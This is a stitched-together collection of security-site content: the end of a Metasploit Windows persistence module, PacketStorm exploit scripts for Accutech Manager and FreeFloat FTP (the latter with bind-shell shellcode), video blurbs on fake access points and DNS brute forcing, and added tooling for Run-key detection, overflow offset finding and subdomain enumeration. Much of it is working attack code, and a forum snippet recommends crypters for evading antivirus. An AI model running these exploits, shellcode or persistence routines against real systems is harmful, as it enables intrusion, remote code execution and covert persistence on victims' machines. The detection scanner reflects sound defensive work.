    reg_val = datastore['REG_NAME']
    @clean_up_rc = ""
    host,port = session.session_host, session.session_port

    # Wrap the payload EXE in a VBS that drops and re-executes it with the requested delay
    exe = generate_payload_exe
    script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
    script_on_target = write_script_to_target(script,rexename)

    if script_on_target == nil
      # exit the module because we failed to write the file on the target host.
      return
    end

    # Initial execution of script
    if target_exec(script_on_target) == nil
      # Exit if we were not able to run the payload.
      return
    end

    case datastore['STARTUP']
    when /USER/i
      regwrite = write_to_reg("HKCU", script_on_target, reg_val)
      # if we could not write the entry in the registry we exit the module.
      if not regwrite
        return
      end
    when /SYSTEM/i
      regwrite = write_to_reg("HKLM", script_on_target, reg_val)
      # if we could not write the entry in the registry we exit the module.
      if not regwrite
        return
      end
    end

    clean_rc = log_file()
    file_local_write(clean_rc,@clean_up_rc)
    print_status("Cleanup Meterpreter RC File: #{clean_rc}")

    report_note(:host => host,
      :type => "host.persistance.cleanup",
      :data => {
        :local_id => session.sid,
        :stype => session.type,
        :desc => session.info,
        :platform => session.platform,
        :via_payload => session.via_payload,
        :via_exploit => session.via_exploit,
        :created_at => Time.now.utc,
        :commands => @clean_up_rc
      }
    )
  end

  # Function for creating log folder and returning log path
  def log_file(log_path = nil)
    #Get hostname
    host = session.sys.config.sysinfo["Computer"]

    # Create Filename info to be appended to downloaded files
    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

    # Create a directory for the logs
    if log_path
      logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
    else
      logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
    end

    # Create the log directory
    ::FileUtils.mkdir_p(logs)

    #logfile name
    logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
    return logfile
  end

  # Writes script to target host
  def write_script_to_target(vbs,name)
    tempdir = expand_path("%TEMP%")
    if name == nil
      tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
    else
      tempvbs = tempdir + "\\" + name + ".vbs"
    end
    begin
      write_file(tempvbs, vbs)
      print_good("Persistent Script written to #{tempvbs}")
      @clean_up_rc << "rm #{tempvbs}\n"
    rescue
      print_error("Could not write the payload on the target hosts.")
      # return nil since we could not write the file on the target host.
      tempvbs = nil
    end
    return tempvbs
  end

  # Executes script on target; returns true on success, nil on failure
  def target_exec(script_on_target)
    execsuccess = true
    print_status("Executing script #{script_on_target}")
    # error handling for process.execute() can throw a RequestError in send_request.
    begin
      if datastore['EXE::Custom'].nil?
        session.shell_command_token(script_on_target)
      else
        session.shell_command_token("cscript \"#{script_on_target}\"")
      end
    rescue
      print_error("Failed to execute payload on target host.")
      execsuccess = nil
    end
    return execsuccess
  end

  # Installs payload in to the registry HKLM or HKCU
  def write_to_reg(key,script_on_target, registry_value)
    # Let's start by assuming we had success.
    write_success = true

    # REG_NAME defaults to '' (not nil), so treat an empty name as "pick a random one" too
    if registry_value.nil? or registry_value.empty?
      nam = Rex::Text.rand_text_alpha(rand(8)+8)
    else
      nam = registry_value
    end

    print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
    if(key)
      set_return = registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ")
      if set_return
        print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
      else
        print_error("Failed to make entry in the registry for persistence.")
        write_success = false
      end
    else
      print_error("Error: failed to open the registry key for writing")
      write_success = false
    end
    # explicit return added: without it the method's value was whatever print_good/print_error
    # returned, so exploit() bailed out before writing the cleanup RC file even on success
    return write_success
  end
end

Source: PacketStorm
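The module above leaves two artefacts a defender can key on: a .vbs dropped in %TEMP% under a random alphabetic name (rand_text_alpha), and a value under HKCU or HKLM ...\CurrentVersion\Run whose data is that script's path. The following Python is an added example by the editor, not part of the Metasploit module, that scans a constructed Run-key listing for that footprint. The one-value-per-line format, the sample entries, the script-extension and temp-directory lists and the "random-looking name" heuristic are all assumptions for the example; in a real environment the same logic runs over reg query output, Autoruns CSV or Sysmon event 13 records.

```python
import re
from collections import namedtuple

RunValue = namedtuple("RunValue", "hive name data")
Finding = namedtuple("Finding", "value reasons")

# One value per line: a flattened `reg query ... /s` listing (constructed format for the example).
RUN_VALUE_RE = re.compile(
    r"^(?P<hive>HKCU|HKLM|HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)"
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<name>\S+)"
    r"\s+REG_(?:SZ|EXPAND_SZ)\s+(?P<data>.+)$",
    re.IGNORECASE,
)
SCRIPT_EXT = (".vbs", ".js", ".wsf", ".bat", ".cmd", ".ps1")
TEMP_DIRS = ("\\temp\\", "\\tmp\\", "%temp%")

# Constructed sample: two benign entries, one module-style drop, one script run through cscript.
SAMPLE_REG_QUERY = r"""
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive    REG_SZ    "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qKzTmWpLeVx    REG_SZ    C:\Users\bob\AppData\Local\Temp\qKzTmWpLeVx.vbs
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\updater    REG_SZ    cscript "C:\Windows\Temp\updater.vbs"
"""


def parse_run_values(lines):
    """Yield RunValue for every Run-key value line; anything else (headers, blanks) is ignored."""
    for line in lines:
        m = RUN_VALUE_RE.match(line.strip())
        if m:
            yield RunValue(m["hive"].upper(), m["name"], m["data"])


def looks_random(name: str) -> bool:
    """Heuristic for rand_text_alpha output: purely alphabetic, 6-16 chars, case flipping at least 4 times.

    Real product names ('OneDrive', 'SecurityHealth') flip case two or three times; a random
    mixed-case string of that length almost always flips more often. Tune before relying on it.
    """
    if not (6 <= len(name) <= 16 and name.isalpha()):
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= 4


def classify(value: RunValue) -> list:
    """Reasons a Run value matches the module's footprint; an empty list means nothing suspicious."""
    reasons = []
    data = value.data.lower()
    is_script = any(ext in data for ext in SCRIPT_EXT)
    in_temp = any(t in data for t in TEMP_DIRS)
    if is_script and in_temp:
        reasons.append("script in temp directory")
    elif is_script:
        reasons.append("script file in autorun")
    if looks_random(value.name):
        reasons.append("random-looking value name")
    return reasons


def scan(lines) -> list:
    """Findings for every Run value with at least one reason, in input order."""
    out = []
    for v in parse_run_values(lines):
        reasons = classify(v)
        if reasons:
            out.append(Finding(v, reasons))
    return out
```

The module's REXENAME and REG_NAME options exist precisely to defeat the name heuristic, so the location check (a script interpreter target living in a temp directory) is the one to weight; the cleanup RC file the module writes is the operator's own record of both artefacts.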
-
Schneider Electric Accutech Manager heap overflow proof of concept exploit.

#Schneider Electric
#Accutech Manager Server Heap Overflow PoC
#RFManagerService - Port: 2537
#I think this is the same vuln that ExodusIntel discovered. Credit also goes to Aaron Portnoy, ExodusIntel.
#The patch has not been released yet.
#Evren Yalcin, Signalsec Ltd. (www.signalsec.com)
#Download app:
#http://telemetry.schneider-electric.com/id2/media/downloads/software/scadarange/Accutech%20Manager%201.89.2.zip

import socket
import sys

host = "192.168.163.128"
port = 2537

# 400 bytes of 'A' in the request path overflows the statically sized heap buffer
buf = "\x41" * 400
req = ("GET /" + buf + " HTTP/1.1\r\n"
       "Host: " + host + ":" + str(port) + "\r\n")

print " [+] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(req)
data = s.recv(1024)
s.close()

#(d40.e8c): Access violation - code c0000005 (!!! second chance !!!)
#eax=41414141 ebx=00fd0000 ecx=41414141 edx=0b2999a8 esi=0b2999a0 edi=00000005
#eip=7c91142e esp=0ba3fc28 ebp=0ba3fe48 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
#7c91142e 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=????????
#----snip----
#.text:0040DE91 push offset aReceivedReques ; "Received request, parsing...\n"
#.text:0040DE96 call nullsub_1
#.text:0040DE9B lea eax, [ebp+cbTransfer]
#.text:0040DEA1 push eax ; char * ; GET /AAAAAAAAAAAAAAAAAAAAAAAAA
#.text:0040DEA2 push esi ; int
#.text:0040DEA3 call sub_40E006
#.text:0040DEA8 add esp, 0Ch
#----snip---
#call sub_40E006 function copies GET data to statically sized heap buffer.

Source: PacketStorm
-
FreeFloat FTP version 1.0 raw command buffer overflow exploit.

#!/usr/bin/env python
# Exploit Title: FreeFloat FTP raw commands buffer overflow
# Date: 10 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.freefloat.com/
# Version: FreeFloat FTP 1.0
# Tested on: Windows XP Pro SP2, English
#
# Description:
# FreeFloat FTP 1.0 allows an attacker to trigger a buffer overflow and
# execute arbitrary code when a long and invalid raw command is sent to it.
#

import socket, struct, sys

if len(sys.argv) < 3:
    print "usage: %s IP port" % (sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

# Bind shellcode generated with msfvenom:
# msfvenom -p windows/shell_bind_tcp
#   -b "\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d"
#   -e x86/fnstenv_mov
#
# [*] x86/fnstenv_mov succeeded with size 366 (iteration=1)
shellcode = (
    "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc8" +
    "\x4c\xab\x8c\x83\xeb\xfc\xe2\xf4\x34\xa4\x22\x8c\xc8\x4c" +
    "\xcb\x05\x2d\x7d\x79\xe8\x43\x1e\x9b\x07\x9a\x40\x20\xde" +
    "\xdc\xc7\xd9\xa4\xc7\xfb\xe1\xaa\xf9\xb3\x9a\x4c\x64\x70" +
    "\xca\xf0\xca\x60\x8b\x4d\x07\x41\xaa\x4b\x2a\xbc\xf9\xdb" +
    "\x43\x1e\xbb\x07\x8a\x70\xaa\x5c\x43\x0c\xd3\x09\x08\x38" +
    "\xe1\x8d\x18\x1c\x20\xc4\xd0\xc7\xf3\xac\xc9\x9f\x48\xb0" +
    "\x81\xc7\x9f\x07\xc9\x9a\x9a\x73\xf9\x8c\x07\x4d\x07\x41" +
    "\xaa\x4b\xf0\xac\xde\x78\xcb\x31\x53\xb7\xb5\x68\xde\x6e" +
    "\x90\xc7\xf3\xa8\xc9\x9f\xcd\x07\xc4\x07\x20\xd4\xd4\x4d" +
    "\x78\x07\xcc\xc7\xaa\x5c\x41\x08\x8f\xa8\x93\x17\xca\xd5" +
    "\x92\x1d\x54\x6c\x90\x13\xf1\x07\xda\xa7\x2d\xd1\xa0\x7f" +
    "\x99\x8c\xc8\x24\xdc\xff\xfa\x13\xff\xe4\x84\x3b\x8d\x8b" +
    "\x37\x99\x13\x1c\xc9\x4c\xab\xa5\x0c\x18\xfb\xe4\xe1\xcc" +
    "\xc0\x8c\x37\x99\xfb\xdc\x98\x1c\xeb\xdc\x88\x1c\xc3\x66" +
    "\xc7\x93\x4b\x73\x1d\xc5\x6c\xbd\x13\x1f\xc3\x8e\xc8\x5d" +
    "\xf7\x05\x2e\x26\xbb\xda\x9f\x24\x69\x57\xff\x2b\x54\x59" +
    "\x9b\x1b\xc3\x3b\x21\x74\x54\x73\x1d\x1f\xf8\xdb\xa0\x38" +
    "\x47\xb7\x29\xb3\x7e\xdb\x41\x8b\xc3\xf9\xa6\x01\xca\x73" +
    "\x1d\x24\xc8\xe1\xac\x4c\x22\x6f\x9f\x1b\xfc\xbd\x3e\x26" +
    "\xb9\xd5\x9e\xae\x56\xea\x0f\x08\x8f\xb0\xc9\x4d\x26\xc8" +
    "\xec\x5c\x6d\x8c\x8c\x18\xfb\xda\x9e\x1a\xed\xda\x86\x1a" +
    "\xfd\xdf\x9e\x24\xd2\x40\xf7\xca\x54\x59\x41\xac\xe5\xda" +
    "\x8e\xb3\x9b\xe4\xc0\xcb\xb6\xec\x37\x99\x10\x7c\x7d\xee" +
    "\xfd\xe4\x6e\xd9\x16\x11\x37\x99\x97\x8a\xb4\x46\x2b\x77" +
    "\x28\x39\xae\x37\x8f\x5f\xd9\xe3\xa2\x4c\xf8\x73\x1d\x4c" +
    "\xab\x8c"
)

# EIP overwritten at offset 251
# JMP ESP 7CA58265 SHELL32.DLL, Windows XP Pro SP2, English
jmpesp = struct.pack("<I", 0x7CA58265)

# 251 bytes of padding, return address, NOP sled, then the bind shell
buf = "\x41" * 251 + jmpesp + "\x90" * 129 + shellcode

print "[+] exploiting target %s:%d" % (ip, port)
print "[+] try connecting to %s on port 4444" % (ip)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(1024)
s.send(buf + "\r\n")

Source: PacketStorm
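The two numbers the FreeFloat exploit above depends on, the EIP offset of 251 and the bad-character list handed to msfvenom, are normally found with a cyclic pattern and a bad-byte scan rather than by hand. The Python below is an added example by the editor, not the exploit author's code: cyclic produces the Metasploit-style Aa0Aa1... pattern, cyclic_find recovers the offset from the four bytes that land in EIP (as bytes or as the register value from the debugger), and first_bad_char compares the 0x01..0xff run that was sent against the copy read back from memory to find the next byte the encoder must avoid. The EIP value 0x34694133 and the "memory" buffers in the usage are constructed for the example.

```python
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def cyclic(length: int) -> bytes:
    """Metasploit-style pattern_create: 'Aa0Aa1Aa2...'; every 4-byte window is unique for the first 20280 bytes."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def cyclic_find(value, length: int = 20280) -> int:
    """pattern_offset: value is the 4 bytes seen at EIP, or the EIP register as an int (little-endian)."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return cyclic(length).find(needle)


def all_bytes(exclude: bytes = b"") -> bytes:
    """The 0x01..0xff run sent in place of shellcode to find bytes the target mangles (0x00 assumed bad)."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_bad_char(sent: bytes, seen: bytes):
    """Compare the run we sent with the copy read back from the debugger; return the first bad byte, or None.

    A byte can corrupt in place (replaced, e.g. 0x27 -> 0x00) or truncate the copy (e.g. 0x0a ending a
    line-based read); both are caught. Only the first is reported because everything after it is
    unreliable: drop it from the run and send again until the two buffers match.
    """
    for i, (a, b) in enumerate(zip(sent, seen)):
        if a != b:
            return sent[i]
    if len(seen) < len(sent):
        return sent[len(seen)]
    return None
```

With cyclic(400) in place of the 251 'A's, the crash shows EIP = 0x34694133, and cyclic_find of that value gives 251, which is why the exploit above pads with exactly that many bytes before the JMP ESP address.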
-
Description: In this video the Invincea team talks about how you can defend against the Adobe Flash 0day vulnerability, and Invincea shows that you can stop the exploit without any signature.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Defending Against The Adobe Flash 0day
-
Description: In this video I will show you how to create a Fake AP and, using Ettercap, we will use Metasploit Browser Exploitation. When the victim tries to visit any website that you have spoofed, it will redirect to our malicious page for explo
itation and maybe he will think the page is loading. There is a lot more you can do with a Fake AP, and there are lots of people who want free internet access in public places.

Source: Fake -- Ap + Dns Spoof + Browser Exploitation
-
Description: In this video I will show you how to use the txdns tool for a brute-force attack on subdomains. TXDNS is a Win32 aggressive multithreaded DNS digger, capable of placing thousands of DNS queries per minute on the wire. TXDNS's main goal is to expose a domain namespace through a number of techniques:
> Typos: Mised, doouble and transposde keystrokes;
> TLD/ccSLD rotation;
> Dictionary attack;
> Full Brute-force attack: alpha, numeric or alphanumeric charsets.

Source: TXDNS, an aggressive multithreaded DNS digger.

Source: Txdns Aggressive Multithreaded Dns Digger
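The four techniques TXDNS lists above are all candidate generation; resolving the names is the easy part. The following Python is an added example by the editor, not TXDNS code, that generates candidates the same way: keystroke typos (missed, doubled and transposed characters, the "Mised, doouble and transposde" of the list), TLD/ccSLD rotation, a dictionary, and an exhaustive charset run of bounded length, with a count function so the run length can be budgeted before it is started. The word list, the suffix list and the example.com base are constructed inputs; handing the output to a resolver is left to the caller.

```python
import itertools
import string

ALNUM = string.ascii_lowercase + string.digits


def typo_variants(label: str) -> set:
    """Missed, doubled and transposed keystrokes of one DNS label (what TXDNS calls 'typos')."""
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])                                 # missed keystroke
        out.add(label[:i] + label[i] + label[i:])                          # doubled keystroke
        if i + 1 < len(label):
            out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])   # transposed keystrokes
    out.discard(label)
    return {v for v in out if v}


def tld_rotation(name: str, suffixes) -> set:
    """Keep the registrable label and swap the TLD / ccSLD: example.com -> example.net, example.co.uk ..."""
    head = name.split(".", 1)[0]
    return {head + "." + s for s in suffixes}


def dictionary(domain: str, words) -> set:
    """Classic wordlist prefixing: www.example.com, mail.example.com ..."""
    return {w + "." + domain for w in words}


def brute_force(domain: str, charset: str, max_len: int):
    """Every label of 1..max_len characters over charset, shortest first (a generator: this gets big fast)."""
    for k in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=k):
            yield "".join(chars) + "." + domain


def brute_force_count(charset: str, max_len: int) -> int:
    """How many names brute_force will yield: sum of len(charset)**k for k = 1..max_len."""
    return sum(len(charset) ** k for k in range(1, max_len + 1))


# Constructed sample inputs for the example.
WORDS = ["www", "mail", "vpn", "dev", "staging"]
SUFFIXES = ["net", "org", "co.uk", "de"]
```

The count function is the practical part: three alphanumeric characters are already 47,988 queries, so the "thousands of queries per minute" figure in the description sets a hard limit on how deep a full brute force can go, and typo and dictionary generation are where the hits actually come from.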
-
A suggestion for everyone's security on this forum.
Praetorian503 replied to OCAK's topic in Sugestii (Suggestions)
If you scan the crypters on VirusTotal too, it is obvious. If you look more closely you will see that something like this has already been done. Even so, I prefer NoVirusThanks, and for crypters, elementscanner
-
Description: Online documentation: OWASP Bricks content page #1

Source: Owasp Bricks - How To Solve The Third Challenge: Content Page #1
-
Description: Online documentation: OWASP Bricks File upload page #1

Source: Owasp Bricks - How To Solve The Second Challenge: File Upload Page #1
-
Description: Online documentation: OWASP Bricks Login page #1

Source: Owasp Bricks - How To Solve The First Challenge: Log In Page #1
-
Description: Online documentation: OWASP Bricks Installation

Source: Owasp Bricks Installation
-
Description: Welcome to Part 6 of the Aircrack-ng Megaprimer! In this video, I will be discussing the tool airdecap-ng. For more videos in the series and other great information security related videos, please visit: http://www.securitytube.net As always, if you have any questions or feedback, you can leave them in the comments below, or you can reach me via e-mail at bennett@securitytube.net

Source: Aircrack-Ng Megaprimer Part 6: Airdecap-Ng
-
Description: After I sent my exploit to exploit-db and 1337day, I made you this demo to show how it works.

Links For The Exploit:
http://www.exploit-db.com/exploits/24320/
1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Tools used: HCON STF
My Exploit
Music: Infected Mushroom With Mayumana - Converting Vegetarian (Live)

Exploit Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: SQLiteManager | Free Development software downloads at SourceForge.net
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Software:
Name: SQLiteManager
Official Site: SQLiteManager - administration de bases de données SQLite.
Name: Ampps
Official Site: Softaculous AMPPS
Name: VertrigoServ
Official Site: VertrigoServ
===============================================================
About Software:
Official Site: SQLiteManager - administration de bases de données SQLite.
SQLiteManager is a database manager for SQLite databases. You can manage any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================

Source: Sqlitemanager Remote Php Code Execution(Injection) Vulnerability - Demo
-
Source: Ipad For Security Professionals - Metasploit In Ios 6.1 By @Japtron